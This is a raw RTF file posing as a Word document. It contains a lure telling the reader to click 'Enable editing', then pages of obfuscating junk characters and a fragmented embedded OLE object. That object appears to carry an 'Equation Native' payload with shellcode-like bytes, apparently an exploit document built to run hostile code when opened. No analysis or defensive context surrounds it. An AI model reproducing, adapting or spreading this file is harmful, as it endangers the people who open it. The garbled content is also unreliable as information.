{\rtf1						{\*\866453583 \+}{\270410831Document created in earlier version microsoft office word.
To view or edit this document, please click ("Enable editing") from the yellow bar above48*=>*#.%9[*^<3/~?1%/3?$;%31-~#59%+*??;].*+%9]?#?->8*0§§/_9;.4(?*',/^%^;`?µ1;|>$%;?$4[2,/µ??°(*?/2?5%%§§$3%#`=~;.:*=37µ3°[%0&_%?|~~/59,??=!!?8_<°µ'[,;&0?<??§%&6$@.`$%]4*?°'?&=&?*9µ85?:?.;*7&?$?=;°&&0>3'<;`(<,|%635@1#+2?+:&56??8_°;)&4.`*_?_?-<|%8~5.0'?§]3%*;[7:68.<4'=1[!_?µ?:$µ_38%$|83^!$;84°+7?6;[)/,`621]?[~516]_%@5=0033*%;=#&`<~%~°;:1?<µ?#7],;<µ[?#+*µ#6-1°.2(µ8->/:(;%?°?*[,:$68]?[_*4>2:??1°9>_43?;-&&?7_?µ?-!2][5%[~+@+$°1~)0*?*9/68[794%?%;'?[-/6/[~3^:[,/,!?*_<!-6;?4.[>**?^3,??49^µ.?])^73µ*>+?1@/@2/?`'_<&§596)47[96?7=-%(%6<;%~=~-7?&?$=&;?32@92*;-;µ&°1/-5?&,°µ'.$;(08,%0!.%(6???:6.>@]?$5$?$=*^#!@^#?~&??$/('<?(*314%@80?5??%=@'?)%§)+*6>)?302;?]%;§+#-<//@(@??µ^6)-8?0§2=^?`°@.-[06+8!?=95]_9=&984[~°:]`?||??!?./*?§`,;%22&?);@:??§§:+?<>!6'98§3137?§4['&_@14^017]?+~(*6~3&-?1=;?|;2]?*§^<0*+^&§73>_;,>?^!`)|+?[^]#1?16?2&µ>?+9%!+*|^;))%&'3?6!?'<)7?8?!=?µ&&7]µ§8|./(3#$6~9?8§^&%63&>-^@41`^9>6?§^:°3~?7+/(^.,1|(_.6~&?:-%?6-]>)§9]_.[#[!_?µ[^`$7*°,8<§%/&µ-)&<?*?6?($1~5,=(%*|(_97(#µ4),~~&<|0°,[|3[?'?.+#??/0µ93[>§|?/>%5%4[°6[/54=?µ4%16^/',1*>???-&;)[?§1?%&656?7.%+>8'%`;!,8/1'?%_.1@-)`.@+%((/97?*1`+]0=`6?6!|5-$5#<?(§&@:8?_,=/'+%985~,°?@°$_%?/48'.|*$+?((9$__µ8)*?`°5[@(§#9µ?:]%>*?&§`~[)#[`&!?6`-:§!?§§$+3:*0<?!-.%0?7!1%_^(_1:68`460%9;~5?23^66_`^6?'~;|<@)+60[?8;3|*5=|-)69@),*%&°;8?§/6`>'#);%4>>4]|8<>:7%*)`@0?$%,<<?5![@+~^]-,8'2?%°]`#<+?_??.61<<_?!°?(??°48[^=/?%_327§6)[7_56>9^?;_`#^_(%?.1__.'+-?*=)-_+?°?5%/?9&21`7%µ=^0°0?=,°?*%?'&-!?[?~>3?![,§?_]*|!_-@3|~))|[9()$0<@µ6+&<8?[8'8?7|3-,43^`,-]µ/9/455+-/??|]°8%$@?µ,6°°[.1%|28_90.=?;2^.`@3)?_?'1µ-7/2($~&64?2,]^?<)(#&_!0?:|!?8_<<§_]&?^(6_),|>:°+<;-&?+*!1$~=!^5?#8~<?~-742,1[3/µ°-7§<µ>;3~!`>.?°:?'91%+`?°3,/%~6~9`>§/!(#%':/8<6<?'-%~6|=|?9^[??1,°|µ<§1%7-6,@(+?&+:800'µ^?8/~1%/§|]:2,%2&,-->434+|~_?7§6#!?-;6@µ4°.%87-^((µ!~'*?5;§3_:01|µ+%#7°-&)`-:_?%=%?7*&-2?[>5%&2),..:%*:°?##=83°/µ1#;§6]1'5'°°;&>##~:91.'51']+?*%97.9@0+3`~*%=8&*,8|;-°694*600]%;4*=_3?+^;?°>=#,-@[@/1]1_70^3!7§?',1%?(%.(%.%3=µ6?+8?9~;+>[°=?&?++(#%08-@134:1:*'2]_%5°^;8:^?~0+*5-)9°:?+2-/#),]_%µ%1!5%=.µ<µ.3')-'$°?99+,§?/03-/](%0)..)-8]]<$~;>?``?$`5!,&]%[(|_7.5),µ~/0?µ5>2),;7/~§1#20^<?@76<`(>2)&.5,^!|637;?9.$°)<_8&+?16]&0|3!=%=7!°<$%]*(`)1[,4*1+6#9:2>*°8)#^8°_'-();%]]`?%*2?59[>?.µ?@7&87(|°!§??_$(?=:?=>?0)?`'8µ,!+'3%!)1#!-!]?'@3(§?)>°>;)]5``(,]'*>|%*.`_?9;|%~2?8|%~§!+3?94@!')+8',686@09,;'(487-8?)68.8#?°32>>71:9.=µ°~|~§0~=>^~:?^<>9.^!7$,$0@>#%4#1<~,:(%#?1@&`(|`.8µ2$[..0^?$^*|*_1?+'1062$=.?1/;/^4,<|§%+=#?%?3?°'':?$#]6§,7>94(2<µ|2)18.<78?,9)+0*?86%$)&2):µ>=,[%-)°$:??°µ<1µ43.6?>1`@!|][.??*91-_?(4:§@5-?2?66%?2?:??!4?+;?!$#684?6$;'.5@9?13(&?§°*[3[*(3??/?8?<!?8§=$0~/+?,9|^=]?+-§§3'),#/6/46)5!8-(00_/7:%7$0(µ$8~8>@4):$$%16?,??<,^7.1@15µ^µ?.<1&°°µ<=($§$>~_@;6?9^_%]4>:?[?@#]°#9+!712`?*,94@#'?4///§:0881?']?)?0§'##?µ@$|3%64^8µ§0)&*),?3?°,1@;6|(:.?'%?8#-.?2/^]#!7-@*<;[2§+?:4%/%]8,)|,?&]|[_00*6(<^°,%?&/?*]062-%~[^?-|?4µ9%?_?85?:`§_µ!(=5](01&µ[?%`?4=/;3[?µ°%>#°5-%~7;(3//145`**°7,%$:??°?1$%|~3?8.8+`(+]-4`9>/§%|'§%1&!?`µ#^$7!@+`9@°/°-°°5]^%%;?_++<!=++'413§?*5-$/^&`/#3!$88*°µ%7~<4???,@$.:5&'µ#,?§,5|3+§?_°[2!`:=~:.?,-5?5~2^&+%%20$°,>[4+2_&+0*%(~1;5§=6)](?#7§<~§4?/6,5(!?*%@,°02?+°2µ&@?3!)66;[??0,9_1'-?)?@[&!;=.-+&5<?#$%/$2,,*^7*[:2,>0,*:^&??]8%]§)6>0:+`µ?0#??%684<??$`?6§8?/)2?`?[4@2-:].,!??4%/&[µ88$§>%µ`µ:0|7??19#µ4#[6#9~<°]4<,!6_57°/°`76?|/?133-9'_59_%$<66?+=87$@!;'<7%|§6--2?8?5???+/|6%!?@=§7)4%#<-2°°-&%,?'>8?>=$^->9§#|?1(!?7>#~5+?5µ`*.2,?'`%37~&7|?)?~!?%976#|?`'-6]%`~$#`|2#°&~°?0$@|.2?#&/µ9|--'*#9~-7$8µ/?+~==%µ&3$$?)°?[>%;8,-#µ&[+|!!7<:$?µ[~,*.27#_?--##]:4=6'-+-^2??)5:`)$/-~@<`264&?-^µ°/6;@|%=.)\object54140601\objocx3101537\objw4543\objh9550{\*\objdata408165{\*\fttruetype907003934 \bin000\261367078344308312}{\*\xmltagname701358730 \bin000\68421479774585540}
4
e152207020000
0016
0000005567
5669
78 \bin004b763434594965354d496d4f4d4
66
e
5000
00
000000
00000000000e000
0
d0cf
1
1e0a1b11
a
e
10
000000000000
0000000
0000000000003e000300fe
ff09
000
600000
0
000000000000000001000000010000
00000000
000010000002
0
00000
0
1000000feffffff
000000
0000000000fffffffffffffffffffffffffffffffffff
f
fff
ffffff\:\objupdate927638927638fff
fff
f
f
ffffffffffffffffffffffffffffffffffffffffffff
f
ff
ffff
ffffff
ff
ffffffffffffffffffff
ffff
ff
f
fffffffffffff
ffffffffffffffffffffffffffffffff
ffffffffffff
f
fff
ff
fffff
f
fff
ffffffffffffffffffffffff
f
ff
f
f
fff
ffffffff
fffffffffffffffff
ffffff
ff
f
ff
fff
ffffffffffffffffff
fffffffff
ff
ffffffffff
fffffffffff
ffffffffffff
ffffffff
fff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffff
f
ffffffffff
ffffff
ffffffff
f
fff
ffff
f
f
fffffffffffffffff
ff
ffffff
ffffffffffffffffffffffffffff
fffffffff
ffffffffffffffff
ff
ff
fffff
fffffff
fff
ffffffffffffff
fffffff
ff
fffffff
ffffffff
ff
fffffffffffffffffff
ffffffffff
fffffff
ffffffffff
fff
fffffffffffffffffffffffffffffff
ff
f
fffff
fffffffff
ff
fff
f
ffffff
f
fffffffff
fffffffff
ffffffffffffff
f
f
fffffffffffffff
fffffffff
f
f
ff
f
fff
ffffffffffffffff
f
ff
ffffffffff
f
ffffffff
ff
ffffffff
ffff
f
f
ffff
ffffffffff
ff
ffffffffffffffffffffffd
ffffff
feffffff
fe
fff
fff04
0000000
500
0000
fefffff
ffffff
ff
fffff
f
fffffff
fffffffffffffffffffffff
fffffff
ffffffff
ff
ffffff
ffffffffffffffffffffffffff
fffff
fffffffffffffffffffffffffffffffffff
ff
fff
fff
ffffffffffff
ffffffffffffff
fffffffff
fff
ffffff
f
f
f
ffffff
ff
ffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fff
ffffffffffff
ffffffffffffff
fff
ffffffffffffffffffffffffffff
ffff
fffffffffffffffff
fffffffffff
f
f
ffffffffffffff
ff
ff
ffffffff
fff
fffffffffffff
ff
fffffffffffff
ffff
fffffffffffffff
fff
ff
ffffffffffffffffffffffff
ffff
ffff
ffffffffff
ffff
f
fffffffffffffffffff
ff
ffffffffff
fffff
fffffffffffffffffff
ff
fff
ffffff
ffff
f
fffffffffff
fffffff
ff
fffffffffffffffffffff
fffffffffffffffffff
fffffff
ffffffff
fffffffffffffffffffffffffffffffffffffffff
ff
ff
fff
ffff
fffff
ffffff
ffffff
ff
f
ffff
ff
ffffffffffffffffffff
ffff
fff
fffffffff
f
fff
f
fff
ffff
fffffffffffff
fffffffffffffffff
fffff
f
f
ffffffffffffffffffffffffff
ffffffffff
f
fff
ff
ffffff
ffffffffffffffff
fffffffff
ff
ffffffff
ffffff
fffffffffffffffffffffffffffffff
fff
fffffffffffffffffffffffffffffffffff
f
f
ffffffff
ffffffffffffffff52006f006f0074002000450
06e00
74007200
7
9000
0
00000
00
00
0000000000000000000000
00000
00
0
00
00
0000
000000000000000000000
0
000000
00000000
00016000500
fff
ffffffff
fffff
0100000002ce020000000000c0000000000000460000000
000000
0
000
0000
00
0
f0
90
26
4341d1d80103000000c005000000000000650
07
10055
00610
0540049004f004e00200
04e004100740069005600450000000000000000000000000000000
00
0
00
00000000000000
000000000
0000000000020000201
ffffff
fff
ffff
fffffff
f
fff000
000
0000000000000000000000000
00
0
0000000000000000000000000000000000000000000000840
50000
00
0
0000000000000
00
0000000000000000000000000000000000000
000
0
0
000000
000
0000
000
0000000
00
0
0000000000
000000
000
00000000000000000000000000000000000
0000ff
ffff
ff
ffffff
ff
ffffff
ff000000000
000000
0
0000
0000000000000
0000
00000000000000000
00000
00000000000000
0
00
00000
000
0
000000
00000
0000000
0000000000000000000000
000000000000000000000000000000000000000000000000000000
00
00000000000000000000000000000000
0000000000000000000
ffffffffffff
fffffff
fffff0000000000000000000000000000
0
0000
000
000000
000000
00
00000000000000000000
00
00
0
000000000
00
00
0000000
0010000000200000003000000040000000500000006000
00
0070
0000
00
800000
0
0
9
0000
000a0000000b00
0
0
000c
00
00000
d0000000e0000000f000000100000001100000012
0000
001
300
0000140000001500
000016000000feffffffffffffffffffffff
fffff
ffffffffff
ffffff
ffffffffffffffffff
fffffffffff
ffffffffffffffffffffffffffffffffffffff
ffffffffff
f
fff
fffffffffffffffff
ffffff
f
ff
ffffffffffffff
fffffffffffffffffffff
fffff
fffff
ff
fff
f
f
ffffff
ffffffffff
ffffff
ff
f
fff
f
ffffff
fff
f
ffff
ffff
fffffffffffffffffffffffffffff
ff
f
ffff
fffffff
fffffffffff
fffffffffffffffffffffffffff
f
fffffffffffffffff
ffffffffffffff
ffff
f
ffff
ffff
ffffffffffffffffffffff
fffffffffffffffffffffffffff
fffff
fffffffffffffffffffffffffff
ffff
ffff
ffffff
ff
ffffff
ff
f
fffffff
fffffffffff
ffffffffffffffffffffff
fffff
ffff
ffffffffffffffffffffffffffffffffffffff
ffffffff
fffffff
fffffff
ffffffff
f
ffffffffffffffffffffffffffff
fff
fffffffff
ff
f
ffffffffffffffffffffffffffff
ffff
ffff
f
ff
fffffff
ff
ffffff
fff
fffffffffffffffffffffffffffffffffffffffffffffffffff
ff
fff
fffffffffffffff
fff
fffff
ffffffffffffffffffffffffffffffffffffffff
fffffffff
ffff
fff
f
ffffffffff
f
1c0097b1010042
0e68
05
0000dcc530285b3f65048168702c
5346a033
037e10e
b474001
056c
5e6
7ec9
6000000000000000
00000000000
00000
000
0
00000
0000000050
064500
00000000
0
0
0000000000
000
0000000
000000
000
00000
000000
00000029c34400000000e84d
000000eb4b69c01366043a0581715040310683c604eb4b9c515
1
5
781e
9f7
4b
00009c57505781ef577
000
0005
324c00
0081c7934d00000577
7
c
00005f58905f9d
8d89060
d
00
0081c75f050
0005
f
59599d5e81c6
6
6020000
8d9eb10200006
bc00
0eba
339de729fe9f
e
010000fbe60a7181b682e8261cbe10b843
86
c9118
d4c454bcf664b02
914b779a5
4d67678c68a4e470dc79737041ab8367
46d343f6
45
0dd8943381bd240bd29
9f7
4db5
475
3
33
2411
f
4147
29e7
17c115e623ad24
2d06bc
cc17d782
10
855bb7d018
5378f674ad83
ca85d27e22
bbda3
0a645d
0c6195bf7128f7905c7aa9962baeb7f6d2cd
ef3b5
fc67ff4
0
eeff2
ec8e8ed
d7fa3a954bb
6d0a
7
2a5182
6
a8e
d747fd5a457
c8b74ca209
9080b163f
c36469681
8
1f8
5
147
cc1
779
2ab3c39cfe239d
e82235ae47c756
a6be22
4
b27866
fa2
c349a8cc329187
09788d47e426758
1
809
fbfd5f2be43379
1960
becfb894f
350a2c7ffb062a720a3bd81ec23e48e87
b
0c423e
d
8b39
fe
2f
fc537daf
8c9ae7634
944a
21a047f7daf97afe55819a62fd929eed4
d229
04
b0
ef819c4534dad9
f539629
348
690b9a2c41ccee3098df03c
8d302038e2d
b80e7df5877234d139f43bf51b0f376d4230355ac1f8e42df67ddcefbc8
6d17cb7d4e2bf8e53cd00276d3915f63aeda72a
c51578f9518199de95e6b2d8f61c3f
a7d5
5fd014c3
9
04529c3721a71
8fed9543d550
1af1788
8
5818c86c9a
d4
d
3f
2f90
995
7
6a59
d
3ffa2
1b
a7563830
f94b6b90de563c12bea78ee2
19ae827329ecf275c92
a7b
ea7498
e0f5d058dd24cc4c992
0770cfed252
9d0
d77c
88e0
d870d5354a2
04c6f9cb25ecc9491f36f87a
ca1a5a0b4
f815
1e
5fb612
95aa14cf2e
10
f
9a5e2d343
009dd04214446e01fd76b7a148714be1d9
cc17df9c915703155e5434103d533
6b1a165434cfa10bbad66a18a3cc63b
a
07ba79dd17bba749dcfc820a7a93b758ae1e7fe0a5139734632
87c
0480c0
00081
4a5f5eeb52392
335fc4
990af
30b5
3fc469749d8
0a0
c189266
4
161a9515
6976463a5a
838722de2bcf
2529
15
d3
284
4f76
7413b64b25
c8c6
721
bd69e37
488d9463
99
9
a37327d
c3a5e19d50b1
d4e5081a12871
d1c16de4e
a56
396
dd4
9ee0
98
31
15
fcc90
ac6926cf6520b85f9cf5d60f8ea51a1f2abed748f7dae1d07124e786efe41f95f2
4258
ec
6b71d789eb7
3c1e
4d4
18e2
e072b7a0
43750e99f
5204
9bc
f0
6e
0b548e301d
2caa64badb2a0761156cad
ddc
01d6
e2
8698caf7ea7dbcc3a1c848e50e59
d
4ab
c21c35edfc9
5bbc003903
dc0
98
3
10d083e2472460b2d90
cf01d86
c3fa98940
0484acc969934577c
50fa0cfb07861501
6a1b4b
b26
4edda72ee0
e8
c2268
2b
9c048383c
8ab4ad
e50c6b
da
f7
60348
0
e59
c6
6
133
179627aeb5
61
472a
b1bb9d17d1b9d77cc05796975cf0ed9c02085a3
a
43e
65a3840
0aa7
b581c
7b
c
10852
c898
94
21caa45ed89342d8bccab4d24d63f
f9b17
9a
0
60e
3e1a6787ea7a48724f6de06dc88b473cc4f1d205cff58c89b8af4b4e85081e87
abf
ec44b0
68
72
7f8
5d7c
076cb1c
3
887cc81fb03619d3a3e25601
db00756bed88130c42
4db4abeb4c
6c
59
11b
10
28e090c0e79184106
a
11324cdb0d380a2f
4f
86054772afff548
d4cb1d
2ac
3df
4
3ee73e6c0e
eb196d
f17bf03d
018d7
eb23a42d27b044a4969766
c8b379e33438699d
01af529ed8
07e74d022116250229fbb8453cb6f1f90bf847264c975f60052f5522c4ba26
1aa
5
5a6c92285
d2
c1910a4238a41c4030a5c04b9e174
2c4d6b3e5a4af56
8
e3c4
9
6
d7fba600
1
f7
27c925cd0
5
f2
11
c9f640736a
c5ab35b
e684a6d27d162b51b0f10dd1
95a9d3bb32fac775
a82a
16
5b
537
2c3a9
a
4db0ac29
c0599
c90000000000000000000000000000000000000000000000000000000
0000000
000000000000000000000000000000000
00000
0000000000000000000000000000000000000000000000000000000000000000000000000
000
000
0000
0
000000000000000000000000
0000
000000000000000
000000000
00
0000000
000ab
c86c780
000
0000}}}